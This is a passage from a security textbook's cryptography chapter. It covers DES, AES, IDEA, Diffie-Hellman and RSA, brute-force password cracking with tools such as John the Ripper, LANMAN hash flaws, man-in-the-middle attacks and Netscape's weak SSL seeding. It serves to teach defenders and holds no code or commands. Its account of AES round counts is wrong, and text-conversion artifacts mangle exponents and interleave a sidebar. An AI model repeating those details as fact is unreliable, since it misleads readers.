172 Chapter 6 • Cryptography
Significant design flaws such as the short 56-bit key length also affected the
longevity of the DES cipher. Shorter keys are more vulnerable to brute force
attacks. Although Whitfield Diffie and Martin Hellman were the first to criticize
this short key length, even going so far as to declare in 1979 that DES would
be useless within 10 years, DES was not publicly broken by a brute force attack
until 1997.
The first successful brute force attack against DES took a large network of
machines over 4 months to accomplish. Less than a year later, in 1998, the
Electronic Frontier Foundation (EFF) cracked DES in less than three days using a
computer specially designed for cracking DES.This computer, code-named
“Deep Crack,” cost less than $250,000 to design and build.The record for
cracking DES stands at just over 22 hours and is held by Distributed.net, which
employed a massively parallel network of thousands of systems (including Deep
Crack). Add to this the fact that Bruce Schneier has theorized that a machine
capable of breaking DES in about six minutes could be built for a mere $10 million.
Clearly, NIST needed to phase out DES in favor of a new algorithm.
AES (Rijndael)
In 1997, as the fall of DES loomed ominously closer, NIST announced the search
for the Advanced Encryption Standard, the successor to DES. Once the search
began, most of the big-name cryptography players submitted their own AES candidates.
Among the requirements of AES candidates were:
 AES would be a private key symmetric block cipher (similar to DES).
 AES needed to be stronger and faster then 3-DES.
 AES required a life expectancy of at least 20-30 years.
 AES would support key sizes of 128-bits, 192-bits, and 256-bits.
 AES would be available to all—royalty free, non-proprietary and
unpatented.
Within months NIST had a total of 15 different entries, 6 of which were
rejected almost immediately on grounds that they were considered incomplete.
By 1999, NIST had narrowed the candidates down to five finalists including
MARS, RC6, Rijndael, Serpent, and Twofish.
Selecting the winner took approximately another year, as each of the candidates
needed to be tested to determine how well they performed in a variety of
environments. After all, applications of AES would range anywhere from portable
smart cards to standard 32-bit desktop computers to high-end optimized 64-bit
computers. Since all of the finalists were highly secure, the primary deciding factors
were speed and ease of implementation (which in this case meant memory
footprint).
Rijndael was ultimately announced as the winner in October of 2000
because of its high performance in both hardware and software implementations
and its small memory requirement.The Rijndael algorithm, developed by Belgian
cryptographers Dr. Joan Daemen and Dr.Vincent Rijmen, also seems resistant to
power- and timing-based attacks.
So how does AES/Rijndael work? Instead of using Feistel cycles in each
round like DES, it uses iterative rounds like IDEA (discussed in the next section).
Data is operated on in 128-bit chunks, which are grouped into four groups of
four bytes each.The number of rounds is also dependent on the key size, such
that 128-bit keys have 9 rounds, 192-bit keys have 11 rounds and 256-bit keys
require 13 rounds. Each round consists of a substitution step of one S-box per
data bit followed by a pseudo-permutation step in which bits are shuffled
between groups.Then each group is multiplied out in a matrix fashion and the
results are added to the subkey for that round.
How much faster is AES than 3-DES? It’s difficult to say, because implementation
speed varies widely depending on what type of processor is performing the
encryption and whether or not the encryption is being performed in software or
running on hardware specifically designed for encryption. However, in similar
implementations, AES is always faster than its 3-DES counterpart. One test performed
by Brian Gladman has shown that on a Pentium Pro 200 with optimized
code written in C, AES (Rijndael) can encrypt and decrypt at an average speed
of 70.2 Mbps, versus DES’s speed of only 28 Mbps.You can read his other results
at fp.gladman.plus.com/cryptography_technology/aes.
IDEA
The European counterpart to the DES algorithm is the IDEA algorithm, and its
existence proves that Americans certainly don’t have a monopoly on strong cryptography.
IDEA was first proposed under the name Proposed Encryption Standard
(PES) in 1990 by cryptographers James Massey and Xuejia Lai as part of a combined
research project between Ascom and the Swiss Federal Institute of
Technology. Before it saw widespread use PES was updated in 1991 to increase its
strength against differential cryptanalysis attacks and was renamed Improved PES
(IPES). Finally, the name was changed to International Data Encryption
Algorithm (IDEA) in 1992.

Not only is IDEA newer than DES, but IDEA is also considerably faster and
more secure. IDEA’s enhanced speed is due to the fact the each round consists of
much simpler operations than the Fiestel cycle in DES.These operations (XOR,
addition, and multiplication) are much simpler to implement in software than the
substitution and permutation operations of DES.
IDEA operates on 64-bit blocks with a 128-bit key, and the encryption/
decryption process uses 8 rounds with 6 16-bit subkeys per round.The IDEA
algorithm is patented both in the US and in Europe, but free non-commercial
use is permitted.
Understanding Asymmetric Algorithms
Recall that unlike symmetric algorithms, asymmetric algorithms require more
than one key, usually a public key and a private key (systems with more than two
keys are possible). Instead of relying on the techniques of substitution and transposition,
which symmetric key cryptography uses, asymmetric algorithms rely on
the use of massively large integer mathematics problems. Many of these problems
are simple to do in one direction but difficult to do in the opposite direction. For
example, it’s easy to multiply two numbers together, but it’s more difficult to
factor them back into the original numbers, especially if the integers you are
using contain hundreds of digits.Thus, in general, the security of asymmetric
algorithms is dependent not upon the feasibility of brute force attacks, but the
feasibility of performing difficult mathematical inverse operations and advances in
mathematical theory that may propose new “shortcut” techniques. In this section,
we’ll take a look at RSA and Diffie-Hellman, the two most popular asymmetric
algorithms in use today.
Diffie-Hellman
In 1976, after voicing their disapproval of DES and the difficulty in handling
secret keys,Whitfield Diffie and Martin Hellman published the Diffie-Hellman
algorithm for key exchange.This was the first published use of public key cryptography,
and arguably one of the cryptography field’s greatest advances ever.
Because of the inherent slowness of asymmetric cryptography, the Diffie-Hellman
algorithm was not intended for use as a general encryption scheme—rather, its
purpose was to transmit a private key for DES (or some similar symmetric algorithm)
across an insecure medium. In most cases, Diffie-Hellman is not used for
encrypting a complete message because it is 10 to 1000 times slower than DES,
depending on implementation.

Prior to publication of the Diffie-Hellman algorithm, it was quite painful to
share encrypted information with others because of the inherent key storage and
transmission problems (as discussed later in this chapter). Most wire transmissions
were insecure, since a message could travel between dozens of systems before
reaching the intended recipient and any number of snoops along the way could
uncover the key.With the Diffie-Hellman algorithm, the DES secret key (sent
along with a DES-encrypted payload message) could be encrypted via Diffie-
Hellman by one party and decrypted only by the intended recipient.
In practice, this is how a key exchange using Diffie-Hellman works:
 The two parties agree on two numbers; one is a large prime number, the
other is an integer smaller than the prime.They can do this in the open
and it doesn’t affect security.
 Each of the two parties separately generates another number, which they
keep secret.This number is equivalent to a private key.A calculation is
made involving the private key and the previous two public numbers.
The result is sent to the other party.This result is effectively a public key.
 The two parties exchange their public keys.They then privately perform
a calculation involving their own private key and the other party’s public
key.The resulting number is the session key. Each party will arrive at the
same number.
 The session key can be used as a secret key for another cipher, such as
DES. No third party monitoring the exchange can arrive at the same
session key without knowing one of the private keys.
The most difficult part of the Diffie-Hellman key exchange to understand is
that there are actually two separate and independent encryption cycles happening.
As far as Diffie-Hellman is concerned, only a small message is being
transferred between the sender and the recipient. It just so happens that this small
message is the secret key needed to unlock the larger message.
Diffie-Hellman’s greatest strength is that anyone can know either or both of
the sender and recipient’s public keys without compromising the security of the
message. Both the public and private keys are actually just very large integers.The
Diffie-Hellman algorithm takes advantage of complex mathematical functions
known as discrete logarithms, which are easy to perform forwards but extremely
difficult to find inverses for. Even though the patent on Diffie-Hellman has been
expired for several years now, the algorithm is still in wide use, most notably in

the IPSec protocol. IPSec uses the Diffie-Hellman algorithm in conjunction with
RSA authentication to exchange a session key that is used for encrypting all
traffic that crosses the IPSec tunnel.
RSA
In the year following the Diffie-Hellman proposal, Ron Rivest, Adi Shamir, and
Leonard Adleman proposed another public key encryption system.Their proposal
is now known as the RSA algorithm, named for the last initials of the
researchers. RSA shares many similarities with the Diffie-Hellman algorithm in
that RSA is also based on multiplying and factoring large integers. However,
RSA is significantly faster than Diffie-Hellman, leading to a split in the asymmetric
cryptography field that refers to Diffie-Hellman and similar algorithms as
Public Key Distribution Systems (PKDS) and RSA and similar algorithms as
Public Key Encryption (PKE). PKDS systems are used as session-key exchange
mechanisms, while PKE systems are generally considered fast enough to encrypt
reasonably small messages. However, PKE systems like RSA are not considered
fast enough to encrypt large amounts of data like entire filesystems or high-speed
communications lines.
NOTE
RSA, Diffie-Hellman and other asymmetric algorithms use much larger
keys than their symmetric counterparts. Common key sizes include 1024-
bits and 2048-bits, and the keys need to be this large because factoring,
while still a difficult operation, is much easier to perform than the
exhaustive key search approach used with symmetric algorithms. The relative
slowness of public key encryption systems is also due in part to
these larger key sizes. Since most computers can only handle 32-bits of
precision, different “tricks” are required to emulate the 1024-bit and
2048-bit integers. However, the additional processing time is somewhat
justified, since for security purposes 2048-bit keys are considered to be
secure “forever”—barring any exponential breakthroughs in mathematical
factoring algorithms, of course.
Because of the former patent restrictions on RSA, the algorithm saw only
limited deployment, primarily only from products by RSA Security, until the
mid-1990s. Now you are likely to encounter many programs making extensive
use of RSA, such as PGP and Secure Shell (SSH).The RSA algorithm has been
in the public domain since RSA Security placed it there two weeks before the
patent expired in September 2000.Thus the RSA algorithm is now freely available
for use by anyone, for any purpose.
Understanding Brute Force
Just how secure are encrypted files and passwords anyway? Consider that there
are two ways to break an encryption algorithm—brute force and various cryptanalysis
shortcuts. Cryptanalysis shortcuts vary from algorithm to algorithm, or
may even be non-existent for some algorithms, and they are always difficult to
find and exploit. Conversely, brute force is always available and easy to try. Brute
force techniques involve exhaustively searching the given keyspace by trying
every possible key or password combination until the right one is found.
Brute Force Basics
As an example, consider the basic three-digit combination bicycle lock where
each digit is turned to select a number between zero and nine. Given enough
time and assuming that the combination doesn’t change during the attempts, just
rolling through every possible combination in sequence can easily open this lock.
The total number of possible combinations (keys) is 103 or 1000, and let’s say the
frequency, or number of combinations a thief can attempt during a time period,
is 30 per minute.Thus, the thief should be able to open the bike lock in a maximum
of 1000/(30 per min) or about 33 minutes. Keep in mind that with each
new combination attempted, the number of remaining possible combinations
(keyspace) decreases and the chance of guessing the correct combination (deciphering
the key) on the next attempt increases.
Brute force always works because the keyspace, no matter how large, is always
finite. So the way to resist brute force attacks is to choose a keysize large enough
that it becomes too time-consuming for the attacker to use brute force techniques.
In the bike lock example, three digits of keyspace gives the attacker a
maximum amount of time of 33 minutes required to steal the bicycle, so the thief
may be tempted to try a brute force attack. Suppose a bike lock with a five-digit
combination is used. Now there are 100,000 possible combinations, which would
take about 55.5 hours for the thief check by brute force. Clearly, most thieves
would move on and look for something easier to steal.
When applied to symmetric algorithms such as DES, brute force techniques
work very similarly to the bike lock example. In fact, this happens to be exactly
the way DES was broken by the EFF’s “Deep Crack.” Since the DES key is
known to be 56 bits long, every possible combination of keys between a string of
56 zeros and a string of 56 ones is tested until the appropriate key is discovered.
As for the distributed attempts to break DES, the five-digit bike lock analogy
needs to be slightly changed. Distributed brute force attempts are analogous to
having multiple thieves, each with an exact replica of the bike lock. Each of these
replicas has the exact same combination as the original bike lock, and the thieves
work on the combination in parallel. Suppose there are 50 thieves working
together to guess the combination. Each thief tries a different set of 2,000 combinations
such that no two thieves are working on the same combination set (subkeyspace).
Now instead of testing 30 combinations per minute, the thieves are
testing 1500 combinations per minute, and all possible combinations will be
checked in about 67 minutes. Recall that it took the single thief 55 hours to steal
the bike, but now 50 thieves working together can steal the bike in just over an
hour. Distributed computing applications working under the same fundamentals
are what allowed Distributed.net to crack DES in less than 24 hours.
Applying brute force techniques to RSA and other public key encryption
systems is not quite as simple. Since the RSA algorithm is broken by factoring, if
the keys being used are sufficiently small (far, far smaller than any program using
RSA would allow), it is conceivable that a person could crack the RSA algorithm
using pencil and paper. However, for larger keys, the time required to perform
the factoring becomes excessive. Factoring does not lend itself to
distributed attacks as well, either.A distributed factoring attack would require
much more coordination between participants than simple exhaustive keyspace
coordination.There are projects, such as the www-factoring project
(www.npac.syr.edu/factoring.html), that endeavor to do just this. Currently, the
www-factoring project is attempting to factor a 130-digit number. In comparison,
512-bit keys are about 155 digits in size.
Using Brute Force to Obtain Passwords
Brute force is a method commonly used to obtain passwords, especially if the
encrypted password list is available.While the exact number of characters in a
password is usually unknown, most passwords can be estimated to be between 4
and 16 characters. Since only about 100 different values can be used for each
character of the password, there are only about 1004 to 10016 likely password
combinations.Though massively large, the number of possible password combinations
is finite and is therefore vulnerable to brute force attack.

Before specific methods for applying brute force can be discussed, a brief
explanation of password encryption is required. Most modern operating systems
use some form of password hashing to mask the exact password. Because passwords
are never stored on the server in cleartext form, the password authentication
system becomes much more secure. Even if someone unauthorized
somehow obtains the password list, he will not be able to make immediate use of
it, hopefully giving system administrators time to change all of the relevant passwords
before any real damage is caused.
Passwords are generally stored in what is called hashed format.When a password
is entered on the system it passes through a one-way hashing function, such as
Message Digest 5 (MD5), and the output is recorded. Hashing functions are oneway
encryption only, and once data has been hashed, it cannot be restored.A
server doesn’t need to know what your password is. It needs to know that you
know what it is.When you attempt to authenticate, the password you provided is
passed through the hashing function and the output is compared to the stored
hash value. If these values match, then you are authenticated. Otherwise, the login
attempt fails, and is (hopefully) logged by the system.
Brute force attempts to discover passwords usually involve stealing a copy of
the username and hashed password listing and then methodically encrypting possible
passwords using the same hashing function. If a match is found, then the
password is considered cracked. Some variations of brute force techniques involve
simply passing possible passwords directly to the system via remote login
attempts. However, these variations are rarely seen anymore due to account
lockout features and the fact that they can be easily spotted and traced by system
administrators.They also tend to be extremely slow.
Appropriate password selection minimizes—but cannot completely eliminate—
a password’s ability to be cracked. Simple passwords, such as any individual word
in a language, make the weakest passwords because they can be cracked with an
elementary dictionary attack. In this type of attack, long lists of words of a particular
language called dictionary files are searched for a match to the encrypted password.
More complex passwords that include letters, numbers and symbols require
a different brute force technique that includes all printable characters and generally
take an order of magnitude longer to run.
Some of the more common tools used to perform brute force password
attacks include L0phtcrack for Windows passwords, and Crack and John the
Ripper for UNIX passwords. Not only do hackers use these tools but security
professionals also find them useful in auditing passwords. If it takes a security professional
N days to crack a password, then that is approximately how long it will
take an attacker to do the same. Each of these tools will be discussed briefly, but
be aware that written permission should always be obtained from the system
administrator before using these programs against a system.
L0phtcrack
L0phtCrack is a Windows NT password-auditing tool from the L0pht that came
onto the scene in 1997. It provides several different mechanisms for retrieving the
passwords from the hashes, but is used primarily for its brute force capabilities.
The character sets chosen dictate the amount of time and processing power necessary
to search the entire keyspace.Obviously, the larger the character set
chosen, the longer it will take to complete the attack. However, dictionary based
attacks, which use only common words against the password database are normally
quite fast and often effective in catching the poorest passwords.Table 6.1
lists the time required for L0phtcrack 2.5 to crack passwords based on the character
set selected.
Table 6.1 L0phtcrack 2.5 Brute Force Crack Time Using a Quad Xeon 400
MHz Processor

Test: Brute Force Crack :)

Machine: Quad Xeon 400 MHz
Character Set Time
Alpha-Numeric 5.5 Hours
Alpha-Numeric-Some Symbols 45 Hours
Alpha-Numeric-All Symbols 480 Hours
Used with permission of the L0pht
L0pht Heavy Industries, the developers of L0phtcrack, have since sold the
rights to the software to @stake Security. Since the sale,@stake has released a
program called LC3, which is intended to be L0phtcrack’s successor. LC3
includes major improvements over L0phtcrack 2.5, such as distributed cracking
and a simplified sniffing attachment that allows password hashes to be sniffed over
Ethernet. Additionally, LC3 includes a password-cracking wizard to help the less
knowledgeable audit their system passwords. Figure 6.2 shows LC3 displaying the
output of a dictionary attack against some sample user passwords.
LC3 reflects a number of usability advances since the older L0phtcrack 2.5
program, and the redesigned user interface is certainly one of them. Both
L0phtCrack and LC3 are commercial software packages. However, a 15-day trial
can be obtained at www.atstake.com/research/lc3/download.html.

Crack

The oldest and most widely used UNIX password cracking utility is simply called
Crack. Alec Muffett is the author of Crack, which he calls a password-guessing
program for UNIX systems. It runs only on UNIX systems against UNIX passwords,
and is for the most part a dictionary-based program. However, in the latest
release available (v5.0a from 1996), Alec has bundled Crack7, a brute force password
cracker that can be used if a dictionary-based attack fails. One of the most
interesting aspects of this combination is that Crack can test for common variants
that people use when they think they are picking more secure passwords. For
example, instead of “password,” someone may choose “pa55word.” Crack has
user-configurable permutation rules that will catch these variants. More information
on Alec Muffett and Crack is available at www.users.dircon.co.uk/~crypto.

Figure 6.2 Output of a Simple Dictionary-Based Attack

John the Ripper :)

John the Ripper is another password-cracking program, but it differs from Crack
in that it is available in UNIX, DOS, and Win32 editions. Crack is great for older
systems using crypt(), but John the Ripper is better for newer systems using MD5
and similar password formats. John the Ripper is used primarily for UNIX passwords,
but there are add-ons available to break other types of passwords, such as
Windows NT LanManager (LANMAN) hashes and Netscape Lightweight
Directory Access Protocol (LDAP) server passwords. John the Ripper supports
brute force attacks in incremental mode. Because of John the Ripper’s architecture,
one of its most useful features is its ability to save its status automatically during
the cracking process, which allows for aborted cracking attempts to be restarted
even on a different system. John the Ripper is part of the OpenWall project and
is available from www.openwall.com/john.
A sample screenshot of John the Ripper is shown in Figure 6.3. In this
example, a sample section of a password file in OpenBSD format is cracked using
John the Ripper. Shown below the password file snippet is the actual output of
John the Ripper as it runs.You can see that each cracked password is displayed on
the console. Be aware that the time shown to crack all four passwords is barely over
a minute only because I placed the actual passwords at the top of the “password.lst”
listing, which John uses as its dictionary. Real attempts to crack passwords would
take much longer.After John has cracked a password file, you can have John display
the password file in unshadowed format using the show option.

Knowing When Real Algorithms
Are Being Used Improperly
While theoretically, given enough time, almost any encryption standard can be
cracked with brute force, it certainly isn’t the most desirable method to use when
“theoretically enough time” is longer than the age of the universe.Thus, any
shortcut method that a hacker can use to break your encryption will be much
more desirable to him than brute force methods.
None of the encryption algorithms discussed in this chapter have any serious
flaws associated with the algorithms themselves, but sometimes the way the algorithm
is implemented can create vulnerabilities. Shortcut methods for breaking
encryption usually result from a vendor’s faulty implementation of a strong
encryption algorithm, or lousy configuration from the user. In this section, we’ll
discuss several incidents of improperly used encryption that are likely to be
encountered in the field.
Bad Key Exchanges
Because there isn’t any authentication built into the Diffie-Hellman algorithm,
implementations that use Diffie-Hellman-type key exchanges without some sort
of authentication are vulnerable to man-in-the-middle (MITM) attacks.The most
notable example of this type of behavior is the SSH-1 protocol. Since the protocol
itself does not authenticate the client or the server, it’s possible for someone
to cleverly eavesdrop on the communications.This deficiency was one of the
main reasons that the SSH-2 protocol was completely redeveloped from SSH-1.
The SSH-2 protocol authenticates both the client and the server, and warns of or
prevents any possible MITM attacks, depending on configuration, so long as the
client and server have communicated at least once. However, even SSH-2 is vulnerable
to MITM attacks prior to the first key exchange between the client and
the server.
As an example of a MITM-type attack, consider that someone called Al is
performing a standard Diffie-Hellman key exchange with Charlie for the very
first time, while Beth is in a position such that all traffic between Al and Charlie
passes through her network segment. Assuming Beth doesn’t interfere with the
key exchange, she will not be able to read any of the messages passed between Al
and Charlie, because she will be unable to decrypt them. However, suppose that
Beth intercepts the transmissions of Al and Charlie’s public keys and she responds
to them using her own public key. Al will think that Beth’s public key is actually
Charlie’s public key and Charlie will think that Beth’s public key is actually Al’s
public key.
When Al transmits a message to Charlie, he will encrypt it using Beth’s public
key. Beth will intercept the message and decrypt it using her private key. Once
Beth has read the message, she encrypts it again using Charlie’s public key and
transmits the message on to Charlie. She may even modify the message contents
if she so desires. Charlie then receives Beth’s modified message, believing it to
come from Al. He replies to Al and encrypts the message using Beth’s public key.
Beth again intercepts the message, decrypts it with her private key, and modifies
it.Then she encrypts the new message with Al’s public key and sends it on to Al,
who receives it and believes it to be from Charlie.
Clearly, this type of communication is undesirable because a third party not
only has access to confidential information, but she can also modify it at will. In
this type of attack, no encryption is broken because Beth does not know either
Al or Charlie’s private keys, so the Diffie-Hellman algorithm isn’t really at fault.
Beware of the key exchange mechanism used by any public key encryption
system. If the key exchange protocol does not authenticate at least one and
preferably both sides of the connection, it may be vulnerable to MITM-type
attacks. Authentication systems generally use some form of digital certificates
(usually X.509), such as those available from Thawte or VeriSign.
Hashing Pieces Separately
Older Windows-based clients store passwords in a format known as LanManager
(LANMAN) hashes, which is a horribly insecure authentication scheme.
However, since this chapter is about cryptography, we will limit the discussion of
LANMAN authentication to the broken cryptography used for password storage.
As with UNIX password storage systems, LANMAN passwords are never
stored on a system in cleartext format—they are always stored in a hash format.
The problem is that the hashed format is implemented in such a way that even
though DES is used to encrypt the password, the password can still be broken
with relative ease. Each LANMAN password can contain up to 14 characters, and
all passwords less than 14 characters are padded to bring the total password length
up to 14 characters. During encryption the password is split into a pair of sevencharacter
passwords, and each of these seven-character passwords is encrypted
with DES.The final password hash consists of the two concatenated DESencrypted
password halves.
Since DES is known to be a reasonably secure algorithm, why is this implementation
flawed? Shouldn’t DES be uncrackable without significant effort? Not
exactly. Recall that there are roughly 100 different characters that can be used in
a password. Using the maximum possible password length of 14 characters, there
should be about 10014 or 1.0x1028 possible password combinations. LANMAN
passwords are further simplified because there is no distinction between upperand
lowercase letters—all letters appears as uppercase. Furthermore, if the password
is less than eight characters, then the second half of the password hash is
always identical and never even needs to be cracked. If only letters are used (no
numbers or punctuation), then there can only be 267 (roughly eight billion) password
combinations.While this may still seem like a large number of passwords to
attack via brute force, remember that these are only theoretical maximums and
that since most user passwords are quite weak, dictionary-based attacks will
uncover them quickly.The bottom line here is that dictionary-based attacks on a
pair of seven-character passwords (or even just one) are much faster than those on
single 14-character passwords.
Suppose that strong passwords that use two or more symbols and numbers are
used with the LANMAN hashing routine.The problem is that most users tend to
just tack on the extra characters at the end of the password. For example, if a user
uses his birthplace along with a string of numbers and symbols, such as “MONTANA45%,”
the password is still insecure. LANMAN will break this password
into the strings “MONTANA” and “45%.”The former will probably be caught
quickly in a dictionary-based attack, and the latter will be discovered quickly in
a brute force attack because it is only three characters. For newer businessoriented
Microsoft operating systems such as Windows NT and Windows 2000,
LANMAN hashing can and should be disabled in the registry if possible, though
this will make it impossible for Win9x clients to authenticate to those machines.
Using a Short Password to Generate a Long Key
Password quality is a subject that we have already briefly touched upon in our
discussion of brute force techniques.With the advent of PKE encryption schemes
such as PGP, most public and private keys are generated using passwords or
passphrases, leaving the password generation steps vulnerable to brute force
attacks. If a password is selected that is not of significant length, that password can
be brute force attacked in an attempt to generate the same keys as the user.Thus
PKE systems such as RSA have a chance to be broken by brute force, not
because of any deficiency in the algorithm itself, but because of deficiencies in
the key generation process.The best way to protect against these types of roundabout
attacks is to use strong passwords when generating any sort of encryption
key. Strong passwords include the use of upper- and lowercase letters, numbers,
and symbols, preferably throughout the password. Eight characters is generally
considered the minimum length for a strong password, but given the severity of
choosing a poor password for key generation, I recommend you use at least
twelve characters for these instances.
High quality passwords are often said to have high entropy, which is a semifinite
measurement that attempts to quantify the relative quality of a password.
Longer passwords typically have more entropy than shorter passwords, and the
more random each character of the password is, the more entropy in the password.
For example, the password “albatross” (about 30 bits of entropy) might be
reasonably long in length, but has less entropy than a totally random password of
the same length such as “g8%=MQ+p” (about 48 bits of entropy). Since the
former might appear in a list of common names for bird species, while the latter
would never appear in a published list, obviously the latter is a stronger and
therefore more desirable password.The moral of the story here is that strong
encryption such as 168-bit 3-DES can be broken easily if the secret key has only
a few bits of entropy.
Improperly Stored Private or Secret Keys
Let’s say you have only chosen to use the strong cryptography algorithms, you
have verified that there are not any flaws in the vendors’ implementations, and
you have generated your keys with great care. How secure is your data now? It is
still only as secure as your private or secret key.These keys must be safeguarded at
all costs, or you may as well not even use encryption.
Since keys are simply strings of data, they are usually stored in a file somewhere
in your system’s hard disk. For example, private keys for SSH-1 are stored
in the identity file located in the .ssh directory under a user’s home directory. If
the filesystem permissions on this file allow others to access the file, then this private
key is compromised. Once others have your private or secret key, reading
your encrypted communications becomes trivial. (Note that the SSH identity file
is used for authentication, not encryption; but you get the idea.)
However, in some vendor implementations, your keys could be disclosed to
others because the keys are not stored securely in RAM. As you are aware, any
information processed by a computer, including your secret or private key, is
located in the computer’s RAM at some point. If the operating system’s kernel
does not store these keys in a protected area of its memory, they could conceivably
become available to someone who dumps a copy of the system’s RAM to a
file for analysis.These memory dumps are called core dumps in UNIX, and they
are commonly created during a denial of service (DoS) attack.Thus a successful
hacker could generate a core dump on your system and extract your key from
the memory image. In a similar attack, a DoS attack could cause excess memory
usage on the part of the victim, forcing the key to be swapped to disk as part of
virtual memory. Fortunately, most vendors are aware of this type of exploit by
now, and it is becoming less and less common since encryption keys are now
being stored in protected areas of memory.

Netscape’s Original SSL Implementation :)

How Not to Choose Random Numbers
As we have tried to point out in this section, sometimes it does not
matter if you are using an algorithm that is known to be secure. If your
algorithm is being applied incorrectly, there will be security holes. An
excellent example of a security hole resulting from misapplied cryptography
is Netscape’s poor choice of random number seeds used in the
Secure Sockets Layer (SSL) encryption of its version 1.1 browser. You no
doubt note that this security flaw is several years old and thus of limited
importance today. However, below the surface we’ll see that this particular
bug is an almost classic example of one of the ways in which vendors
implement broken cryptography, and as such it continues to remain
relevant to this day. We will limit this discussion to the vulnerability in
the UNIX version of Netscape’s SSL implementation as discovered by Ian
Goldberg and David Wagner, although the PC and Macintosh versions
were similarly vulnerable.
Before I can explain the exact nature of this security hole we will
need to cover some background information, such as SSL technology
and random numbers. SSL is a certificate-based authentication and
encryption scheme developed by Netscape during the fledgling days of
e-commerce. It was intended to secure communications such as credit
card transactions from eavesdropping by would-be thieves. Because of
U.S. export restrictions, the stronger and virtually impervious 128-bit
(key) version of the technology was not in widespread use. In fact, even
Tools & Traps…
Continued

Understanding Amateur
Cryptography Attempts
If your data is not being protected by one of the more modern, computationally
secure algorithms that we’ve already discussed in this chapter, or some similar
variant, then your data is probably not secure. In this section, we’re going to discover
how simple methods of enciphering data can be broken using rudimentary
cryptanalysis.

domestically, most of Netscape’s users were running the anemic 40-bit
international version of the software.
Most key generation, including SSL key generation, requires some
form of randomness as a factor of the key generation process. Arbitrarily
coming up with random numbers is much harder than it sounds, especially
for machines. So we usually end up using pseudo-random numbers
that are devised from mostly random events, such as the time
elapsed between each keystroke you type or the movement of your
mouse across the screen.
For the UNIX version of its version 1.1 browser, Netscape used a
conglomeration of values, such as the current time, the process ID (PID)
number of the Netscape process and its parent’s process ID number.
Suppose the attacker had access to the same machine as the Netscape
user simultaneously, which is the norm in UNIX-based multi-user architectures.
It would be trivial for the attacker to generate a process listing
to discover Netscape’s PID and its parent’s PID. If the attacker had the
ability to capture TCP/IP packets coming into the machine, he could use
the timestamps on these packets to make a reasonable guess as to the
exact time the SSL certificate was generated. Once this information was
gathered, the attacker could narrow down the keyspace to about 106
combinations, which is then brute force attacked with ease at near realtime
speeds. Upon successfully discovering Netscape’s SSL certificate
seed generation values, he can generate an identical certificate for himself
and either eavesdrop or hijack the existing session.
Clearly, this was a serious security flaw that Netscape would need
to address in its later versions, and it did, providing patches for the 1.x
series of browsers and developing a new and substantially different
random number generator for its 2.x series of browsers. You can read
more details about this particular security flaw in the archives of Dr.
Dobbs’ Journal at www.ddj.com/documents/s=965/ddj9601h.

Classifying the Ciphertext
Even a poorly encrypted message often looks indecipherable at first glance, but
you can sometimes figure out what the message is by looking beyond just the
stream of printed characters. Often, the same information that you can “read
between the lines” on a cleartext message still exists in an enciphered message.
For the mechanisms discussed below, all the “secrecy” is contained in the
algorithm, not in a separate key. Our challenge for these is to figure out the algorithm
used. So for most of them, that means that we will run a password or some
text through the algorithm, which will often be available to us in the form of a
program or other black box device. By controlling the inputs and examining the
outputs, we hope to determine the algorithm.This will enable us to later take an
arbitrary output and determine what the input was.
NOTE
The techniques described in this section are largely ineffective on modern
algorithms such as DES and its successors. What few techniques do exist
to gain information from modern ciphertext are quite complicated and
only work under special conditions.
Frequency Analysis
The first and most powerful method you can employ to crack simple ciphertext
is frequency analysis, which is based on the idea that certain letters are used more
often than others. For example, I can barely write a single word in this sentence
that doesn’t include the letter e. How can letter frequency be of use? You can
create a letter frequency table for your ciphertext, assuming the message is of sufficient
length, and compare that table to one charting the English language (there
are many available).That would give you some clues about which characters in
the ciphertext might match up with cleartext letters.
The astute reader will discover that some letters appear with almost identical
frequency. How then can you determine which letter is which? You can either
evaluate how the letters appear in context, or you can consult other frequency
tables that note the appearance of multiple letter combinations such as sh, ph, ie
and the.

Crypto of this type is just a little more complicated than the Caesar Cipher
mentioned at the beginning of the chapter.This was state-of-the-art hundreds of
years ago. Now problems of this type are used in daily papers for commuter
entertainment, under the titles of “Cryptogram,”“CryptoQuote,” or similar. Still,
some people will use this method as a token effort to hide things.This type of
mechanism, or ones just slightly more complex, show up in new worms and
viruses all the time.
Ciphertext Relative Length Analysis
Sometimes the ciphertext can provide you with clues to the cleartext even if you
don’t know how the ciphertext was encrypted. For example, suppose that you
have an unknown algorithm that encrypts passwords such that you have available
the original password and a ciphertext version of that password. If the length or
size of each is the same, then you can infer that the algorithm produces output in
a 1:1 ratio to the input.You may even be able to input individual characters to
obtain the ciphertext translation for each character. If nothing else, you at least
know how many characters to specify for an unknown password if you attempt
to break it using a brute force method.
If you know that the length of a message in ciphertext is identical to the
length of a message in cleartext, you can leverage this information to pick out
pieces of the ciphertext for which you can make guesses about the cleartext. For
example, during WWII while the Allies were trying to break the German Enigma
codes, they used a method similar to the above because they knew the phrase
“Heil Hitler” probably appeared somewhere near the end of each transmission.
Similar Plaintext Analysis
A related method you might use to crack an unknown algorithm is to compare
changes in the ciphertext output with changes in the cleartext input. Of course,
this method requires that you have access to the algorithm to selectively encode
your carefully chosen cleartext. For example, try encoding the strings
“AAAAAA,”“AAAAAB” and “BAAAAA” and note the difference in the ciphertext
output. For monoalphabetic ciphers, you might expect to see the first few
characters remain the same in both outputs for the first two, with only the last
portion changing. If so, then it’s almost trivial to construct a full translation table
for the entire algorithm that maps cleartext input to ciphertext output and vice
versa. Once the translation table is complete, you could write an inverse function
that deciphers the ciphertext back to plaintext without difficulty.

What happens if the cipher is a polyalphabetic cipher, where more than one
character changes in the ciphertext for single character changes in cleartext? Well,
that becomes a bit trickier to decipher, depending on the number of changes to
the ciphertext.You might be able to combine this analysis technique with brute
force to uncover the inner workings of the algorithm, or you might not.
Monoalphabetic Ciphers
A monoalphabetic cipher is any cipher in which each character of the alphabet
is replaced by another character in a one-to-one ratio. Both the Caesar Cipher
and ROT13, mentioned earlier in the chapter, are classic examples of monoalphabetic
ciphers. Some monoalphabetic ciphers scramble the alphabet instead
of shifting the letters, so that instead of having an alphabet of ABCDEFGHIJKLMNOPQRSTUVWXYZ,
the cipher alphabet order might be MLNKBJVHCGXFZDSAPQOWIEURYT.
The new scrambled alphabet is used to
encipher the message such that M=A, L=B…T=Z. Using this method, the
cleartext message “SECRET” becomes “OBNQBW.”
You will rarely find these types of ciphers in use today outside of word games
because they can be easily broken by an exhaustive search of possible alphabet
combinations and they are also quite vulnerable to the language analysis methods
we described. Monoalphabetic ciphers are absolutely vulnerable to frequency
